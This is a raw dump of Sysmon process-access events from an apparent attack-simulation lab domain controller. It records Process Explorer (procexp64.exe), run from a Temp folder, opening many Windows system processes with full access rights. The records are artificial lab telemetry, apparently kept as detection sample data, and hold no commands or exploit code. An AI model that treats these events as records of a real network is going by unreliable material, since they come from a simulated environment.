15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790395Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790394Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790393Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790518Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D4A2-00000000A301}4024C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790517Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790516Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790515Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790514Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790513Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790512Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790511Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790510Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790509Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790508Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790507Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790506Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790505Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790504Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790503Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790502Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790501Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790500Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790499Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790498Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790497Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790496Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790495Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790494Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790493Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790492Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790491Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790490Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790489Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790488Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790487Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790486Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790485Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 